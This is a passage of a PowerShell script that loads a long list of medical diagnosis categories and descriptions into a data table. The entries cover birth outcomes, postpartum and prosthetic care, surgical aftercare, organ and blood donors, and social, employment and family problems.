$DiagnosisList.Rows.Add("Outcome of delivery","Single live birth") + $null = $DiagnosisList.Rows.Add("Outcome of delivery","Single stillbirth") + $null = $DiagnosisList.Rows.Add("Outcome of delivery","Twins, both liveborn") + $null = $DiagnosisList.Rows.Add("Outcome of delivery","Twins, one liveborn and one stillborn") + $null = $DiagnosisList.Rows.Add("Outcome of delivery","Twins, both stillborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, all liveborn","Multiple births, unspecified, all liveborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, all liveborn","Triplets, all liveborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, all liveborn","Quadruplets, all liveborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, all liveborn","Quintuplets, all liveborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, all liveborn","Sextuplets, all liveborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, all liveborn","Other multiple births, all liveborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, some liveborn","Multiple births, unspecified, some liveborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, some liveborn","Triplets, some liveborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, some liveborn","Quadruplets, some liveborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, some liveborn","Quintuplets, some liveborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, some liveborn","Sextuplets, some liveborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, some liveborn","Other multiple births, some liveborn") + $null = $DiagnosisList.Rows.Add("Other multiple births, all stillborn","Other multiple births, all stillborn") + $null = $DiagnosisList.Rows.Add("Outcome of delivery, unspecified","Outcome of delivery, unspecified") + $null = $DiagnosisList.Rows.Add("Single liveborn infant, born in hospital","Single liveborn infant, delivered vaginally") + $null = $DiagnosisList.Rows.Add("Single liveborn infant, born in hospital","Single liveborn infant, delivered by cesarean") + $null = $DiagnosisList.Rows.Add("Single liveborn infant, born outside hospital","Single liveborn infant, born outside hospital") + $null = $DiagnosisList.Rows.Add("Single liveborn infant, unspecified as to place of birth","Single liveborn infant, unspecified as to place of birth") + $null = $DiagnosisList.Rows.Add("Twin liveborn infant, born in hospital","Twin liveborn infant, delivered vaginally") + $null = $DiagnosisList.Rows.Add("Twin liveborn infant, born in hospital","Twin liveborn infant, delivered by cesarean") + $null = $DiagnosisList.Rows.Add("Twin liveborn infant, born outside hospital","Twin liveborn infant, born outside hospital") + $null = $DiagnosisList.Rows.Add("Twin liveborn infant, unspecified as to place of birth","Twin liveborn infant, unspecified as to place of birth") + $null = $DiagnosisList.Rows.Add("Other multiple liveborn infant, born in hospital","Triplet liveborn infant, delivered vaginally") + $null = $DiagnosisList.Rows.Add("Other multiple liveborn infant, born in hospital","Triplet liveborn infant, delivered by cesarean") + $null = $DiagnosisList.Rows.Add("Other multiple liveborn infant, born in hospital","Quadruplet liveborn infant, delivered vaginally") + $null = $DiagnosisList.Rows.Add("Other multiple liveborn infant, born in hospital","Quadruplet liveborn infant, delivered by cesarean") + $null = $DiagnosisList.Rows.Add("Other multiple liveborn infant, born in hospital","Quintuplet liveborn infant, delivered vaginally") + $null = $DiagnosisList.Rows.Add("Other multiple liveborn infant, born in hospital","Quintuplet liveborn infant, delivered by cesarean") + $null = $DiagnosisList.Rows.Add("Other multiple liveborn infant, born in hospital","Other multiple liveborn infant, delivered vaginally") + $null = $DiagnosisList.Rows.Add("Other multiple liveborn infant, born in hospital","Other multiple liveborn infant, delivered by cesarean") + $null = $DiagnosisList.Rows.Add("Other multiple liveborn infant, born outside hospital","Other multiple liveborn infant, born outside hospital") + $null = $DiagnosisList.Rows.Add("Other multiple liveborn infant, unspecified as to place of birth","Other multiple liveborn infant, unspecified as to place of birth") + $null = $DiagnosisList.Rows.Add("Encounter for maternal postpartum care and examination","Encounter for care and examination of mother immediately after delivery") + $null = $DiagnosisList.Rows.Add("Encounter for maternal postpartum care and examination","Encounter for care and examination of lactating mother") + $null = $DiagnosisList.Rows.Add("Encounter for maternal postpartum care and examination","Encounter for routine postpartum follow-up") + $null = $DiagnosisList.Rows.Add("Encounter for prophylactic surgery for risk factors related to malignant neoplasms","Encounter for prophylactic removal of unspecified organ") + $null = $DiagnosisList.Rows.Add("Encounter for prophylactic surgery for risk factors related to malignant neoplasms","Encounter for prophylactic removal of breast") + $null = $DiagnosisList.Rows.Add("Encounter for prophylactic surgery for risk factors related to malignant neoplasms","Encounter for prophylactic removal of ovary(s)") + $null = $DiagnosisList.Rows.Add("Encounter for prophylactic surgery for risk factors related to malignant neoplasms","Encounter for prophylactic removal of fallopian tube(s )") + $null = $DiagnosisList.Rows.Add("Encounter for prophylactic surgery for risk factors related to malignant neoplasms","Encounter for prophylactic removal of other organ") + $null = $DiagnosisList.Rows.Add("Encounter for other prophylactic surgery","Encounter for other prophylactic surgery") + $null = $DiagnosisList.Rows.Add("Encounter for prophylactic surgery, unspecified","Encounter for prophylactic surgery, unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for procedures for purposes other than remedying health state","Encounter for cosmetic surgery") + $null = $DiagnosisList.Rows.Add("Encounter for procedures for purposes other than remedying health state","Encounter for routine and ritual male circumcision") + $null = $DiagnosisList.Rows.Add("Encounter for procedures for purposes other than remedying health state","Encounter for ear piercing") + $null = $DiagnosisList.Rows.Add("Encounter for procedures for purposes other than remedying health state","Encounter for other procedures for purposes other than remedying health state") + $null = $DiagnosisList.Rows.Add("Encounter for procedures for purposes other than remedying health state","Encounter for procedure for purposes other than remedying health state, unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for plastic and reconstructive surgery following medical procedure or healed injury","Encounter for breast reconstruction following mastectomy") + $null = $DiagnosisList.Rows.Add("Encounter for plastic and reconstructive surgery following medical procedure or healed injury","Encounter for other plastic and reconstructive surgery following medical procedure or healed injury") + $null = $DiagnosisList.Rows.Add("Encounter for attention to artificial openings","Encounter for attention to tracheostomy") + $null = $DiagnosisList.Rows.Add("Encounter for attention to artificial openings","Encounter for attention to gastrostomy") + $null = $DiagnosisList.Rows.Add("Encounter for attention to artificial openings","Encounter for attention to ileostomy") + $null = $DiagnosisList.Rows.Add("Encounter for attention to artificial openings","Encounter for attention to colostomy") + $null = $DiagnosisList.Rows.Add("Encounter for attention to artificial openings","Encounter for attention to other artificial openings of digestive tract") + $null = $DiagnosisList.Rows.Add("Encounter for attention to artificial openings","Encounter for attention to cystostomy") + $null = $DiagnosisList.Rows.Add("Encounter for attention to artificial openings","Encounter for attention to other artificial openings of urinary tract") + $null = $DiagnosisList.Rows.Add("Encounter for attention to artificial openings","Encounter for attention to artificial vagina") + $null = $DiagnosisList.Rows.Add("Encounter for attention to artificial openings","Encounter for attention to other artificial openings") + $null = $DiagnosisList.Rows.Add("Encounter for attention to artificial openings","Encounter for attention to unspecified artificial opening") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of unspecified artificial arm","Encounter for fitting and adjustment of unspecified right artificial arm") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of unspecified artificial arm","Encounter for fitting and adjustment of unspecified left artificial arm") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of unspecified artificial arm","Encounter for fitting and adjustment of unspecified artificial arm, unspecified arm") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of complete artificial arm","Encounter for fitting and adjustment of complete right artificial arm") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of complete artificial arm","Encounter for fitting and adjustment of complete left artificial arm") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of complete artificial arm","Encounter for fitting and adjustment of complete artificial arm, unspecified arm") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of partial artificial arm","Encounter for fitting and adjustment of partial artificial right arm") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of partial artificial arm","Encounter for fitting and adjustment of partial artificial left arm") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of partial artificial arm","Encounter for fitting and adjustment of partial artificial arm, unspecified arm") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of unspecified artificial leg","Encounter for fitting and adjustment of unspecified right artificial leg") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of unspecified artificial leg","Encounter for fitting and adjustment of unspecified left artificial leg") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of unspecified artificial leg","Encounter for fitting and adjustment of unspecified artificial leg, unspecified leg") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of complete artificial leg","Encounter for fitting and adjustment of complete right artificial leg") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of complete artificial leg","Encounter for fitting and adjustment of complete left artificial leg") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of complete artificial leg","Encounter for fitting and adjustment of complete artificial leg, unspecified leg") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of partial artificial leg","Encounter for fitting and adjustment of partial artificial right leg") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of partial artificial leg","Encounter for fitting and adjustment of partial artificial left leg") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of partial artificial leg","Encounter for fitting and adjustment of partial artificial leg, unspecified leg") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of artificial eye","Encounter for fitting and adjustment of artificial eye, unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of artificial eye","Encounter for fitting and adjustment of artificial right eye") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of artificial eye","Encounter for fitting and adjustment of artificial left eye") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of external breast prosthesis","Encounter for fitting and adjustment of external breast prosthesis, unspecified breast") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of external breast prosthesis","Encounter for fitting and adjustment of external right breast prosthesis") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of external breast prosthesis","Encounter for fitting and adjustment of external left breast prosthesis") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of other external prosthetic devices","Encounter for fitting and adjustment of other external prosthetic devices") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of unspecified external prosthetic device","Encounter for fitting and adjustment of unspecified external prosthetic device") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of cardiac pacemaker","Encounter for checking and testing of cardiac pacemaker pulse generator [battery]") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of cardiac pacemaker","Encounter for adjustment and management of other part of cardiac pacemaker") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of automatic implantable cardiac defibrillator","Encounter for adjustment and management of automatic implantable cardiac defibrillator") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of other cardiac device","Encounter for adjustment and management of other cardiac device") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of infusion pump","Encounter for adjustment and management of infusion pump") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of vascular access device","Encounter for adjustment and management of vascular access device") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of implanted devices of the special senses","Encounter for adjustment and management of implanted visual substitution device") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of implanted hearing device","Encounter for adjustment and management of bone conduction device") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of implanted hearing device","Encounter for adjustment and management of cochlear device") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of implanted hearing device","Encounter for adjustment and management of other implanted hearing device") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of implanted nervous system device","Encounter for adjustment and management of cerebrospinal fluid drainage device") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of implanted nervous system device","Encounter for adjustment and management of neuropacemaker (brain) (peripheral nerve) (spinal cord)") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of implanted nervous system device","Encounter for adjustment and management of other implanted nervous system device") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment or removal of breast implant","Encounter for adjustment or removal of right breast implant") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment or removal of breast implant","Encounter for adjustment or removal of left breast implant") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment or removal of breast implant","Encounter for adjustment or removal of unspecified breast implant") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment or removal of myringotomy device (stent) (tube)","Encounter for adjustment or removal of myringotomy device (stent) (tube)") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of other implanted devices","Encounter for adjustment and management of other implanted devices") + $null = $DiagnosisList.Rows.Add("Encounter for adjustment and management of unspecified implanted device","Encounter for adjustment and management of unspecified implanted device") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of other devices","Encounter for fitting and adjustment of spectacles and contact lenses") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of other devices","Encounter for fitting and adjustment of hearing aid") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of other devices","Encounter for fitting and adjustment of other devices related to nervous system and special senses") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of other devices","Encounter for fitting and adjustment of dental prosthetic device") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of other devices","Encounter for fitting and adjustment of orthodontic device") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of other gastrointestinal appliance and device","Encounter for fitting and adjustment of gastric lap band") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of other gastrointestinal appliance and device","Encounter for fitting and adjustment of other gastrointestinal appliance and device") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of urinary device","Encounter for fitting and adjustment of urinary device") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of other specified devices","Encounter for fitting and adjustment of insulin pump") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of other specified devices","Encounter for fitting and adjustment of non-vascular catheter") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of other specified devices","Encounter for fitting and adjustment of other specified devices") + $null = $DiagnosisList.Rows.Add("Encounter for fitting and adjustment of unspecified device","Encounter for fitting and adjustment of unspecified device") + $null = $DiagnosisList.Rows.Add("Orthopedic aftercare","Aftercare following joint replacement surgery") + $null = $DiagnosisList.Rows.Add("Orthopedic aftercare","Encounter for removal of internal fixation device") + $null = $DiagnosisList.Rows.Add("Aftercare following explantation of joint prosthesis","Aftercare following explantation of shoulder joint prosthesis") + $null = $DiagnosisList.Rows.Add("Aftercare following explantation of joint prosthesis","Aftercare following explantation of hip joint prosthesis") + $null = $DiagnosisList.Rows.Add("Aftercare following explantation of joint prosthesis","Aftercare following explantation of knee joint prosthesis") + $null = $DiagnosisList.Rows.Add("Encounter for other orthopedic aftercare","Encounter for orthopedic aftercare following surgical amputation") + $null = $DiagnosisList.Rows.Add("Encounter for other orthopedic aftercare","Encounter for orthopedic aftercare following scoliosis surgery") + $null = $DiagnosisList.Rows.Add("Encounter for other orthopedic aftercare","Encounter for other orthopedic aftercare") + $null = $DiagnosisList.Rows.Add("Encounter for attention to dressings, sutures and drains","Encounter for change or removal of nonsurgical wound dressing") + $null = $DiagnosisList.Rows.Add("Encounter for attention to dressings, sutures and drains","Encounter for change or removal of surgical wound dressing") + $null = $DiagnosisList.Rows.Add("Encounter for attention to dressings, sutures and drains","Encounter for removal of sutures") + $null = $DiagnosisList.Rows.Add("Encounter for attention to dressings, sutures and drains","Encounter for change or removal of drains") + $null = $DiagnosisList.Rows.Add("Encounter for planned postprocedural wound closure","Encounter for planned postprocedural wound closure") + $null = $DiagnosisList.Rows.Add("Encounter for aftercare following organ transplant","Encounter for aftercare following heart transplant") + $null = $DiagnosisList.Rows.Add("Encounter for aftercare following organ transplant","Encounter for aftercare following kidney transplant") + $null = $DiagnosisList.Rows.Add("Encounter for aftercare following organ transplant","Encounter for aftercare following liver transplant") + $null = $DiagnosisList.Rows.Add("Encounter for aftercare following organ transplant","Encounter for aftercare following lung transplant") + $null = $DiagnosisList.Rows.Add("Encounter for aftercare following multiple organ transplant","Encounter for aftercare following heart-lung transplant") + $null = $DiagnosisList.Rows.Add("Encounter for aftercare following multiple organ transplant","Encounter for aftercare following multiple organ transplant") + $null = $DiagnosisList.Rows.Add("Encounter for aftercare following other organ transplant","Encounter for aftercare following bone marrow transplant") + $null = $DiagnosisList.Rows.Add("Encounter for aftercare following other organ transplant","Encounter for aftercare following other organ transplant") + $null = $DiagnosisList.Rows.Add("Aftercare following surgery for neoplasm","Aftercare following surgery for neoplasm") + $null = $DiagnosisList.Rows.Add("Encounter for surgical aftercare following surgery on specified body systems","Encounter for surgical aftercare following surgery on the sense organs") + $null = $DiagnosisList.Rows.Add("Encounter for surgical aftercare following surgery on specified body systems","Encounter for surgical aftercare following surgery on the nervous system") + $null = $DiagnosisList.Rows.Add("Encounter for surgical aftercare following surgery on specified body systems","Encounter for surgical aftercare following surgery on the circulatory system") + $null = $DiagnosisList.Rows.Add("Encounter for surgical aftercare following surgery on specified body systems","Encounter for surgical aftercare following surgery on the respiratory system") + $null = $DiagnosisList.Rows.Add("Encounter for surgical aftercare following surgery on specified body systems","Encounter for surgical aftercare following surgery on the teeth or oral cavity") + $null = $DiagnosisList.Rows.Add("Encounter for surgical aftercare following surgery on specified body systems","Encounter for surgical aftercare following surgery on the digestive system") + $null = $DiagnosisList.Rows.Add("Encounter for surgical aftercare following surgery on specified body systems","Encounter for surgical aftercare following surgery on the genitourinary system") + $null = $DiagnosisList.Rows.Add("Encounter for surgical aftercare following surgery on specified body systems","Encounter for surgical aftercare following surgery on the skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Encounter for other specified surgical aftercare","Encounter for other specified surgical aftercare") + $null = $DiagnosisList.Rows.Add("Preparatory care for renal dialysis","Encounter for fitting and adjustment of extracorporeal dialysis catheter") + $null = $DiagnosisList.Rows.Add("Preparatory care for renal dialysis","Encounter for fitting and adjustment of peritoneal dialysis catheter") + $null = $DiagnosisList.Rows.Add("Encounter for adequacy testing for dialysis","Encounter for adequacy testing for hemodialysis") + $null = $DiagnosisList.Rows.Add("Encounter for adequacy testing for dialysis","Encounter for adequacy testing for peritoneal dialysis") + $null = $DiagnosisList.Rows.Add("Encounter for other aftercare and medical care","Encounter for antineoplastic radiation therapy") + $null = $DiagnosisList.Rows.Add("Encounter for antineoplastic chemotherapy and immunotherapy","Encounter for antineoplastic chemotherapy") + $null = $DiagnosisList.Rows.Add("Encounter for antineoplastic chemotherapy and immunotherapy","Encounter for antineoplastic immunotherapy") + $null = $DiagnosisList.Rows.Add("Encounter for palliative care","Encounter for palliative care") + $null = $DiagnosisList.Rows.Add("Encounter for desensitization to allergens","Encounter for desensitization to allergens") + $null = $DiagnosisList.Rows.Add("Encounter for other specified aftercare","Encounter for therapeutic drug level monitoring") + $null = $DiagnosisList.Rows.Add("Encounter for other specified aftercare","Encounter for other specified aftercare") + $null = $DiagnosisList.Rows.Add("Unspecified blood donor","Unspecified donor, whole blood") + $null = $DiagnosisList.Rows.Add("Unspecified blood donor","Unspecified donor, stem cells") + $null = $DiagnosisList.Rows.Add("Unspecified blood donor","Unspecified donor, other blood") + $null = $DiagnosisList.Rows.Add("Autologous blood donor","Autologous donor, whole blood") + $null = $DiagnosisList.Rows.Add("Autologous blood donor","Autologous donor, stem cells") + $null = $DiagnosisList.Rows.Add("Autologous blood donor","Autologous donor, other blood") + $null = $DiagnosisList.Rows.Add("Other blood donor","Other blood donor, whole blood") + $null = $DiagnosisList.Rows.Add("Other blood donor","Other blood donor, stem cells") + $null = $DiagnosisList.Rows.Add("Other blood donor","Other blood donor, other blood") + $null = $DiagnosisList.Rows.Add("Skin donor","Skin donor, unspecified") + $null = $DiagnosisList.Rows.Add("Skin donor","Skin donor, autologous") + $null = $DiagnosisList.Rows.Add("Skin donor","Skin donor, other") + $null = $DiagnosisList.Rows.Add("Bone donor","Bone donor, unspecified") + $null = $DiagnosisList.Rows.Add("Bone donor","Bone donor, autologous") + $null = $DiagnosisList.Rows.Add("Bone donor","Bone donor, other") + $null = $DiagnosisList.Rows.Add("Bone marrow donor","Bone marrow donor") + $null = $DiagnosisList.Rows.Add("Kidney donor","Kidney donor") + $null = $DiagnosisList.Rows.Add("Cornea donor","Cornea donor") + $null = $DiagnosisList.Rows.Add("Liver donor","Liver donor") + $null = $DiagnosisList.Rows.Add("Egg (Oocyte) donor","Egg (Oocyte) donor under age 35, anonymous recipient") + $null = $DiagnosisList.Rows.Add("Egg (Oocyte) donor","Egg (Oocyte) donor under age 35, designated recipient") + $null = $DiagnosisList.Rows.Add("Egg (Oocyte) donor","Egg (Oocyte) donor age 35 and over, anonymous recipient") + $null = $DiagnosisList.Rows.Add("Egg (Oocyte) donor","Egg (Oocyte) donor age 35 and over, designated recipient") + $null = $DiagnosisList.Rows.Add("Egg (Oocyte) donor","Egg (Oocyte) donor, unspecified") + $null = $DiagnosisList.Rows.Add("Donor of other specified organs or tissues","Donor of other specified organs or tissues") + $null = $DiagnosisList.Rows.Add("Donor of unspecified organ or tissue","Donor of unspecified organ or tissue") + $null = $DiagnosisList.Rows.Add("Procedure and treatment not carried out because of contraindication","Procedure and treatment not carried out due to patient smoking") + $null = $DiagnosisList.Rows.Add("Procedure and treatment not carried out because of contraindication","Procedure and treatment not carried out because of other contraindication") + $null = $DiagnosisList.Rows.Add("Procedure and treatment not carried out because of patient's decision for reasons of belief and group pressure","Procedure and treatment not carried out because of patient's decision for reasons of belief and group pressure") + $null = $DiagnosisList.Rows.Add("Procedure and treatment not carried out because of patient's decision for other and unspecified reasons","Procedure and treatment not carried out because of patient's decision for unspecified reasons") + $null = $DiagnosisList.Rows.Add("Procedure and treatment not carried out because of patient's decision for other and unspecified reasons","Procedure and treatment not carried out due to patient leaving prior to being seen by health care provider") + $null = $DiagnosisList.Rows.Add("Procedure and treatment not carried out because of patient's decision for other and unspecified reasons","Procedure and treatment not carried out because of patient's decision for other reasons") + $null = $DiagnosisList.Rows.Add("Procedure converted to open procedure","Laparoscopic surgical procedure converted to open procedure") + $null = $DiagnosisList.Rows.Add("Procedure converted to open procedure","Thoracoscopic surgical procedure converted to open procedure") + $null = $DiagnosisList.Rows.Add("Procedure converted to open procedure","Arthroscopic surgical procedure converted to open procedure") + $null = $DiagnosisList.Rows.Add("Procedure converted to open procedure","Other specified procedure converted to open procedure") + $null = $DiagnosisList.Rows.Add("Procedure and treatment not carried out for other reasons","Procedure and treatment not carried out for other reasons") + $null = $DiagnosisList.Rows.Add("Procedure and treatment not carried out, unspecified reason","Procedure and treatment not carried out, unspecified reason") + $null = $DiagnosisList.Rows.Add("Problems related to education and literacy","Illiteracy and low-level literacy") + $null = $DiagnosisList.Rows.Add("Problems related to education and literacy","Schooling unavailable and unattainable") + $null = $DiagnosisList.Rows.Add("Problems related to education and literacy","Failed school examinations") + $null = $DiagnosisList.Rows.Add("Problems related to education and literacy","Underachievement in school") + $null = $DiagnosisList.Rows.Add("Problems related to education and literacy","Educational maladjustment and discord with teachers and classmates") + $null = $DiagnosisList.Rows.Add("Problems related to education and literacy","Other problems related to education and literacy") + $null = $DiagnosisList.Rows.Add("Problems related to education and literacy","Problems related to education and literacy, unspecified") + $null = $DiagnosisList.Rows.Add("Problems related to employment and unemployment","Unemployment, unspecified") + $null = $DiagnosisList.Rows.Add("Problems related to employment and unemployment","Change of job") + $null = $DiagnosisList.Rows.Add("Problems related to employment and unemployment","Threat of job loss") + $null = $DiagnosisList.Rows.Add("Problems related to employment and unemployment","Stressful work schedule") + $null = $DiagnosisList.Rows.Add("Problems related to employment and unemployment","Discord with boss and workmates") + $null = $DiagnosisList.Rows.Add("Problems related to employment and unemployment","Uncongenial work environment") + $null = $DiagnosisList.Rows.Add("Problems related to employment and unemployment","Other physical and mental strain related to work") + $null = $DiagnosisList.Rows.Add("Other problems related to employment","Sexual harassment on the job") + $null = $DiagnosisList.Rows.Add("Other problems related to employment","Military deployment status") + $null = $DiagnosisList.Rows.Add("Other problems related to employment","Other problems related to employment") + $null = $DiagnosisList.Rows.Add("Unspecified problems related to employment","Unspecified problems related to employment") + $null = $DiagnosisList.Rows.Add("Occupational exposure to risk factors","Occupational exposure to noise") + $null = $DiagnosisList.Rows.Add("Occupational exposure to risk factors","Occupational exposure to radiation") + $null = $DiagnosisList.Rows.Add("Occupational exposure to risk factors","Occupational exposure to dust") + $null = $DiagnosisList.Rows.Add("Occupational exposure to other air contaminants","Occupational exposure to environmental tobacco smoke") + $null = $DiagnosisList.Rows.Add("Occupational exposure to other air contaminants","Occupational exposure to other air contaminants") + $null = $DiagnosisList.Rows.Add("Occupational exposure to toxic agents in agriculture","Occupational exposure to toxic agents in agriculture") + $null = $DiagnosisList.Rows.Add("Occupational exposure to toxic agents in other industries","Occupational exposure to toxic agents in other industries") + $null = $DiagnosisList.Rows.Add("Occupational exposure to extreme temperature","Occupational exposure to extreme temperature") + $null = $DiagnosisList.Rows.Add("Occupational exposure to vibration","Occupational exposure to vibration") + $null = $DiagnosisList.Rows.Add("Occupational exposure to other risk factors","Occupational exposure to other risk factors") + $null = $DiagnosisList.Rows.Add("Occupational exposure to unspecified risk factor","Occupational exposure to unspecified risk factor") + $null = $DiagnosisList.Rows.Add("Problems related to housing and economic circumstances","Homelessness") + $null = $DiagnosisList.Rows.Add("Problems related to housing and economic circumstances","Inadequate housing") + $null = $DiagnosisList.Rows.Add("Problems related to housing and economic circumstances","Discord with neighbors, lodgers and landlord") + $null = $DiagnosisList.Rows.Add("Problems related to housing and economic circumstances","Problems related to living in residential institution") + $null = $DiagnosisList.Rows.Add("Problems related to housing and economic circumstances","Lack of adequate food and safe drinking water") + $null = $DiagnosisList.Rows.Add("Problems related to housing and economic circumstances","Extreme poverty") + $null = $DiagnosisList.Rows.Add("Problems related to housing and economic circumstances","Low income") + $null = $DiagnosisList.Rows.Add("Problems related to housing and economic circumstances","Insufficient social insurance and welfare support") + $null = $DiagnosisList.Rows.Add("Problems related to housing and economic circumstances","Other problems related to housing and economic circumstances") + $null = $DiagnosisList.Rows.Add("Problems related to housing and economic circumstances","Problem related to housing and economic circumstances, unspecified") + $null = $DiagnosisList.Rows.Add("Problems related to social environment","Problems of adjustment to life-cycle transitions") + $null = $DiagnosisList.Rows.Add("Problems related to social environment","Problems related to living alone") + $null = $DiagnosisList.Rows.Add("Problems related to social environment","Acculturation difficulty") + $null = $DiagnosisList.Rows.Add("Problems related to social environment","Social exclusion and rejection") + $null = $DiagnosisList.Rows.Add("Problems related to social environment","Target of (perceived) adverse discrimination and persecution") + $null = $DiagnosisList.Rows.Add("Problems related to social environment","Other problems related to social environment") + $null = $DiagnosisList.Rows.Add("Problems related to social environment","Problem related to social environment, unspecified") + $null = $DiagnosisList.Rows.Add("Problems related to upbringing","Inadequate parental supervision and control") + $null = $DiagnosisList.Rows.Add("Problems related to upbringing","Parental overprotection") + $null = $DiagnosisList.Rows.Add("Upbringing away from parents","Child in welfare custody") + $null = $DiagnosisList.Rows.Add("Upbringing away from parents","Institutional upbringing") + $null = $DiagnosisList.Rows.Add("Upbringing away from parents","Other upbringing away from parents") + $null = $DiagnosisList.Rows.Add("Hostility towards and scapegoating of child","Hostility towards and scapegoating of child") + $null = $DiagnosisList.Rows.Add("Inappropriate (excessive) parental pressure","Inappropriate (excessive) parental pressure") + $null = $DiagnosisList.Rows.Add("Personal history of abuse in childhood","Personal history of physical and sexual abuse in childhood") + $null = $DiagnosisList.Rows.Add("Personal history of abuse in childhood","Personal history of psychological abuse in childhood") + $null = $DiagnosisList.Rows.Add("Personal history of abuse in childhood","Personal history of neglect in childhood") + $null = $DiagnosisList.Rows.Add("Personal history of abuse in childhood","Personal history of unspecified abuse in childhood") + $null = $DiagnosisList.Rows.Add("Parent-child conflict","Parent-biological child conflict") + $null = $DiagnosisList.Rows.Add("Parent-child conflict","Parent-adopted child conflict") + $null = $DiagnosisList.Rows.Add("Parent-child conflict","Parent-foster child conflict") + $null = $DiagnosisList.Rows.Add("Other specified problems related to upbringing","Parent-child estrangement NEC") + $null = $DiagnosisList.Rows.Add("Other specified problems related to upbringing","Sibling rivalry") + $null = $DiagnosisList.Rows.Add("Other specified problems related to upbringing","Other specified problems related to upbringing") + $null = $DiagnosisList.Rows.Add("Problem related to upbringing, unspecified","Problem related to upbringing, unspecified") + $null = $DiagnosisList.Rows.Add("Other problems related to primary support group, including family circumstances","Problems in relationship with spouse or partner") + $null = $DiagnosisList.Rows.Add("Other problems related to primary support group, including family circumstances","Problems in relationship with in-laws") + $null = $DiagnosisList.Rows.Add("Absence of family member","Absence of family member due to military deployment") + $null = $DiagnosisList.Rows.Add("Absence of family member","Other absence of family member") + $null = $DiagnosisList.Rows.Add("Disappearance and death of family member","Disappearance and death of family member") + $null = $DiagnosisList.Rows.Add("Disruption of family by separation and divorce","Disruption of family by separation and divorce") + $null = $DiagnosisList.Rows.Add("Dependent relative needing care at home","Dependent relative needing care at home") + $null = $DiagnosisList.Rows.Add("Other stressful life events affecting family and household","Stress on family due to return of family member from military deployment") + $null = $DiagnosisList.Rows.Add("Other stressful life events affecting family and household","Alcoholism and drug addiction in family") + $null = $DiagnosisList.Rows.Add("Other stressful life events affecting family and household","Other stressful life events affecting family and household") + $null = $DiagnosisList.Rows.Add("Other specified problems related to primary support group","Other specified problems related to primary support group") + $null = $DiagnosisList.Rows.Add("Problem related to primary support group, unspecified","Problem related to primary support group, unspecified") + $null = $DiagnosisList.Rows.Add("Problems related to certain psychosocial circumstances","Problems related to unwanted pregnancy") + $null = $DiagnosisList.Rows.Add("Problems related to certain psychosocial circumstances","Problems related to multiparity") + $null = $DiagnosisList.Rows.Add("Problems related to certain psychosocial circumstances","Discord with counselors") + 